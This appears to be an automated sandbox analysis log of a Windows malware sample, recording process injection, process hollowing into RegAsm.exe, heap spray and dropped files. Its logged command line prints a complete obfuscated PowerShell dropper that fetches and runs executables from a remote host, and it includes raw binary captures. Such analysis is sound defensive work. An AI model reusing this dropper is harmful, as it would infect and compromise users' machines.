`àÉúԟI@ǟAǟK@̟ôԟIVǟJ@ǟH@Ǚñ£ÀŸY‰ÔŸI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟó©ÖŸIJݧF@DžÚLǟO¨ÐŸIJé±K¨ÑŸIJé©K¨ÒŸIJÁ§M@Ǚ£Aǟº±ÈŸÃAǟH@ǎ©)!ŸI¨ÓŸIJï‹I@ÉíH@Çï¡OǟO¨ÍŸIN6ŠI@ɅOòٟIð7‰I@ɄN¨ßŸIJËH@Ǜ¤¿àŸH@ÇíšAÇï½ßIBï·I@ɈÄ[ǟHUȉ¿]ï¶I@É=@¨ÚŸIJï´I@ÉH@Ǜ×BǟMûäŸIJEžI@Çæ¦ÀŸCªÀŸHB›LN·²±ÌŸqAǟK@ǎ½Kå©AǞ¬ŸILï°I@ɄڡÀŸCT2¾I@ɂ@ ÀžI@6½I@Ɇ©ÁÀŸI÷ãŸIJï»I@Éí’AÇïæ®ÀŸCSÎMOçgJ@Çì¯ADžºNȎLI6¸I@ɱòðèŸIJ6¦I@Ɇ¸NÈà£ADž·ä7§I@Éà¢ADž@_6£I@ɇ@÷õŸIJÞì§ADžºOЙK^Áàð÷ŸIJЙæ±ÀŸCfԎO´ÏŽO÷ñŸIJ›†æ³ÀŸCJ¥„@´Î†æ²ÀŸCd¦„A´Î‡æ²ÀŸCdÎ¥H¨ÀŸK@]Ÿ¼4ÀƒI@ǟK@çŸ)À…I@ǟK@ٟÀ…I@ǟº±ÂŸ´AǟJ@ǎۜÀŸÙ©óŸIJ2«I@ɅOB6ªI@ÉëJ@Ç´£Aǟe‰ÔŸ ·PH@ǟ8Aǟåœ9ìÝî5¡ûî3àÜó#úÚ·úÚð=íêîúèí-í¥¡5ìêð2ãàãô¿ÿî2ìàð6ҝ·ð¡™·ð£©Œ=ãÝþ2ú”÷-êÝó!㥡êëõ)ü‚î9Ëæô-á”ãÿ¨è¾#ªŸ²ù¬îðא¬Úý-⧓-ìæþ2üìüöÍÜ÷<æäîúÚð=íêîúÝCǟIAǟI@ǟIÛù‚ Ͻù±RI@ǟ~Aǟ¿þÀïIùÀéIýÀåIùÀåI¼ÀáIõÀŸI@Ç¿¹‰ÔŸÄ+pÖÿ•ýS×é(ÑD{Xši %c„ë %0«[’åF+¥án _BýA]¦Á¾(Û?îáeú ö;5 À“yÔKù¥êÛÛàÞð/ÊÆ ë,uv+B$û%’¹xŽV‡ƒqýßU W©Þ0¢ðh<Ù`·E÷eÁwåΡK‡Èç2µ“×fLÜûRýz~XàènóÏ«žkrµ6Û¦ü„îzó¶×«oÐ>‹Ç-ÜrüsÊßîU­±[}WO”6IôL'åÙbïêšV'M"à¯X™«‘×*uú@)òu¨b¨øDÆ5 Šƒ³cQ7©GÒkšP:¹Dšî$_‘FÏ>3Ô-?ƒß½vû49 wæžE-ǡò·ãöo»í‰E=b›qŠžì0md=ºÂ›ÑR¢¥RîØF X|8+½½B™ùÝX&â„È*3ôfm ´7֊Æ.égˆDډ$yë½ð Ë÷#c(zYÞ­|ýTÍ}h_Ó ŸE—:š»()ÿ,%Þ<œ?)c«K¶ÌÉ•!“ºþÓ~ÐÈ꣼åށöB¿Ž-øÿ5+ FàfÈÚ9M»ËÿE­Ð„Ò;\a¹Gñ2»Ã¥<­¼¸ð¹KP!Iá,í +læ½ ^ÚrZn¨â "Q%;ËÝaÙ¤ÖhËÄÊ\žùÓ¡2Wþ¶ëúùIÉ£æê.LÔ)¢C‰œTn,Dl,O4Ð|»69µMÒYÅ|Û:á€VU6ŠŽÖCkÇ" 3{9Ÿ9wƒàÒ¿ê7MvàÒ^ Ž8^"‰| EÌ|zmGËÍÚwÊ:7 ´‚‹_eÁóÞ±ÇY2=3•HÇ=uDø ֚Û÷äÄN.“!5<<ÚÆÞðNÀñûsÎÖÔ2 ÎNel2~òØMD§f’¯UÊ{,µ97f8€YÝnw H³è5åÃÔ$~<}¯ÿ$Ð&jaû ßÜWPNú;¿%´&ÇùSÇvœÆ—Ö
received: 2920
socket: 1436
1 2920 0

recv

buffer: HTTP/1.1 200 OK Date: Wed, 26 Apr 2023 22:42:02 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 26 Apr 2023 06:26:48 GMT ETag: "20c00-5fa37531ef0a3" Accept-Ranges: bytes Content-Length: 134144 Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELлHdà   > @ `@…ðK L@  H.textDþ  `.rsrcL @À.reloc @ @B H0 ، –÷…0ð þ8þ Epd±8k€ þ8Êÿÿÿ~¼(? ç  s ~½(þ ~H{:Žÿÿÿ& 8ƒÿÿÿrps z*þ ~¾(G~¿( ?Ýÿÿÿ ~H{Š:Aÿÿÿ& 86ÿÿÿ~:´ÿÿÿ 8"ÿÿÿB(]((*Nþ þ þ (C*>þ þ (K*&~þ*~*(U*(*0± þ8þ EC.\/8>~Â(W ~H{A:Äÿÿÿ& 8¹ÿÿÿ*~À(O 8¤ÿÿÿs~Ã([ 8‹ÿÿÿ~Á(S ~H{v9lÿÿÿ& 8aÿÿÿ0***(]*0*0 *0*AL˜vhØâº{›¾Yh0*****************************(]*(]*(]*(]*0*0*0¤(] þ8þ Ewc%8r~Ä(_ :Ñÿÿÿ& 8ÆÿÿÿÐ~Î(<~é(=~ê(÷€ 9“ÿÿÿ& 8ˆÿÿÿ~Â(; 8tÿÿÿ**********(]*0W€*Ð ( o €@4%Ð:( €€€€ €.s €,€ s €0€€ € €%~ € ~ €(€€$€ €!s €€j€€€#j€"€ € €+€~ €/€s €€&€€€'€€)~ €-( Ý&Ý*E P*0 W4 ÀŽiZ ]Y X ]: Žij\nXjXm ŽijjZ     8  ‘œ X  Ži?èÿÿÿŽi %G €`ÒR 8$ n jYÔ  YZ?_d ÿj_Ҝ Y  =ÔÿÿÿŽiZ \ #Eg ‰«Íï þܺ˜ vT2 8 b89dXX‘bXX‘b`XX‘b`X‘`žX=D¾ÿÿÿ (F  (F (F (F(F  (F
received: 2920
socket: 1436
1 2920 0
Process injection Process 2936 called NtSetContextThread to modify thread in remote process 196
Process injection Process 2996 called NtSetContextThread to modify thread in remote process 2580
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4994846
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000250
process_identifier: 196
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4210390
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000248
process_identifier: 2580
1 0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\host1.exe
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\123.txt
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\host1.exe"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\system32.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\system32.exe"
parent_process powershell.exe martian_process "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\123.txt
Process injection Process 2564 resumed a thread in remote process 2688
Process injection Process 2936 resumed a thread in remote process 196
Process injection Process 2996 resumed a thread in remote process 2580
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000030c
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

thread_handle: 0x00000250
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x00000248
suspend_count: 1
process_identifier: 2580
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
3221225507 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 6a e4 fe ff e0 dd b2 c3 55 48 c5 8a c0 0a
exception.symbol: host1+0x545af0
exception.instruction: in eax, dx
exception.module: host1.exe
exception.exception_code: 0xc0000096
exception.offset: 5528304
exception.address: 0x1745af0
registers.esp: 4388760
registers.edi: 21674286
registers.eax: 1447909480
registers.ebp: 19767296
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 13
registers.ecx: 10
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2564
1 0 0

CreateProcessInternalW

thread_identifier: 2692
thread_handle: 0x0000030c
process_identifier: 2688
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKrhDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDlRivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-Process (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};function QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBzusbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,76702,76708));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsRSuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EIrofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test-Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76696,76703,76707,76708,76641,76638,76693,76712,76693));MnCAu $eZbyJ $mEkrPEVUnvHtBs;XszcGdVlHyMMWW $eZbyJ;}$PXnzJ = $txkviPAwby + 'system32.exe'; if (Test-Path -Path $PXnzJ){XszcGdVlHyMMWW $PXnzJ;}Else{ $gpdHJmGBeHRamC = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76707,76713,76707,76708,76693,76701,76643,76642,76638,76693,76712,76693));MnCAu $PXnzJ $gpdHJmGBeHRamC;XszcGdVlHyMMWW $PXnzJ;};$oaxCdtTRdtQjSGzhkBM = $txkviPAwby + '123.txt';If(Test-Path -Path $oaxCdtTRdtQjSGzhkBM){Invoke-Item $oaxCdtTRdtQjSGzhkBM;}Else{ $OcHRVIXAgnJxIm = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76641,76642,76643,76638,76708,76712,76708));MnCAu $oaxCdtTRdtQjSGzhkBM $OcHRVIXAgnJxIm;Invoke-Item $oaxCdtTRdtQjSGzhkBM;};;;;}XeKyUELvjZOVnMLkCD;" uac
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

NtResumeThread

thread_handle: 0x0000030c
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

thread_handle: 0x00000318
suspend_count: 1
process_identifier: 2564
1 0 0

NtResumeThread

thread_handle: 0x00000294
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

thread_handle: 0x00000444
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

thread_handle: 0x00000580
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

thread_handle: 0x00000350
suspend_count: 1
process_identifier: 2688
1 0 0

CreateProcessInternalW

thread_identifier: 2940
thread_handle: 0x000005a0
process_identifier: 2936
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\host1.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\host1.exe"
filepath_r: C:\Users\test22\AppData\Roaming\host1.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000005a8
1 1 0

NtResumeThread

thread_handle: 0x00000584
suspend_count: 1
process_identifier: 2688
1 0 0

CreateProcessInternalW

thread_identifier: 3000
thread_handle: 0x000003dc
process_identifier: 2996
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\system32.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\system32.exe"
filepath_r: C:\Users\test22\AppData\Roaming\system32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000005b8
1 1 0

NtResumeThread

thread_handle: 0x000005a0
suspend_count: 1
process_identifier: 2688
1 0 0

CreateProcessInternalW

thread_identifier: 3064
thread_handle: 0x000005d4
process_identifier: 3060
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\123.txt
filepath_r: C:\Windows\system32\NOTEPAD.EXE
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000005d0
1 1 0

NtResumeThread

thread_handle: 0x000005e8
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 2936
1 0 0

NtResumeThread

thread_handle: 0x0000016c
suspend_count: 1
process_identifier: 2936
1 0 0

NtResumeThread

thread_handle: 0x000001a8
suspend_count: 1
process_identifier: 2936
1 0 0

CreateProcessInternalW

thread_identifier: 2164
thread_handle: 0x00000250
process_identifier: 196
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000254
1 1 0

NtGetContextThread

thread_handle: 0x00000250
1 0 0

NtAllocateVirtualMemory

process_identifier: 196
region_size: 819200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000254
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà"  7 @ @ € ÍÞ @…È6 S@ `  H.text$   `.rsrc@  @@.reloc `  @B
base_address: 0x00400000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: €0€ HX@ ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo040904B0$CompanyName,FileDescription0FileVersion1.1.1o4InternalNamelibcrypto<OriginalFilenamelibcrypto$ProductName4ProductVersion1.1.1o |LegalCopyrightCopyright 1998-2022 The OpenSSL Authors. All rights reserved.DVarFileInfo$Translation °
base_address: 0x004c4000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: 0 7
base_address: 0x004c6000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 196
process_handle: 0x00000254
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4994846
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000250
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x00000250
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2996
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2996
1 0 0

CreateProcessInternalW

thread_identifier: 2608
thread_handle: 0x00000248
process_identifier: 2580
current_directory:
filepath: C:\Users\test22\AppData\Roaming\system32.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Roaming\system32.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000024c
1 1 0

NtGetContextThread

thread_handle: 0x00000248
1 0 0

NtAllocateVirtualMemory

process_identifier: 2580
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000024c
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELú”F§à" 0 Ö> @@ €`…ƒ>O@` Ü=8  H.textÜ  `.rsrc@"@@.reloc `*@B
base_address: 0x00400000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€@„„4VS_VERSION_INFO½ïþ    ?DVarFileInfo$Translation°äStringFileInfoÀ000004b04CommentsMicrosoft incHCompanyNameMicrosoft 1989-2023: FileDescriptionSystem324 FileVersion12.6.12.6<InternalNameRuntime64.exeDLegalCopyrightSystem32 © 2023< LegalTrademarksMicrosoftDOriginalFilenameRuntime64.exeFProductNameMicrosoft System328 ProductVersion12.6.12.6< Assembly Version12.5.12.5$Dê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00404000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer: 0 Ø>
base_address: 0x00406000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4210390
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000248
process_identifier: 2580
1 0 0

NtResumeThread

thread_handle: 0x00000248
suspend_count: 1
process_identifier: 2580
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 3060
1 0 0

NtResumeThread

thread_handle: 0x00000178
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x000001f0
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x0000022c
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x00000284
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x0000029c
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x000002f4
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x00000350
suspend_count: 1
process_identifier: 196
1 0 0

NtResumeThread

thread_handle: 0x0000036c
suspend_count: 1
process_identifier: 196
1 0 0
count 10485 name heapspray process powershell.exe total_mb 655 length 65536 protection PAGE_READWRITE
count 79 name heapspray process powershell.exe total_mb 519 length 6889472 protection PAGE_READWRITE
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Roaming\host1.exe
file C:\Users\test22\AppData\Roaming\system32.exe
file C:\Windows\System32\notepad.exe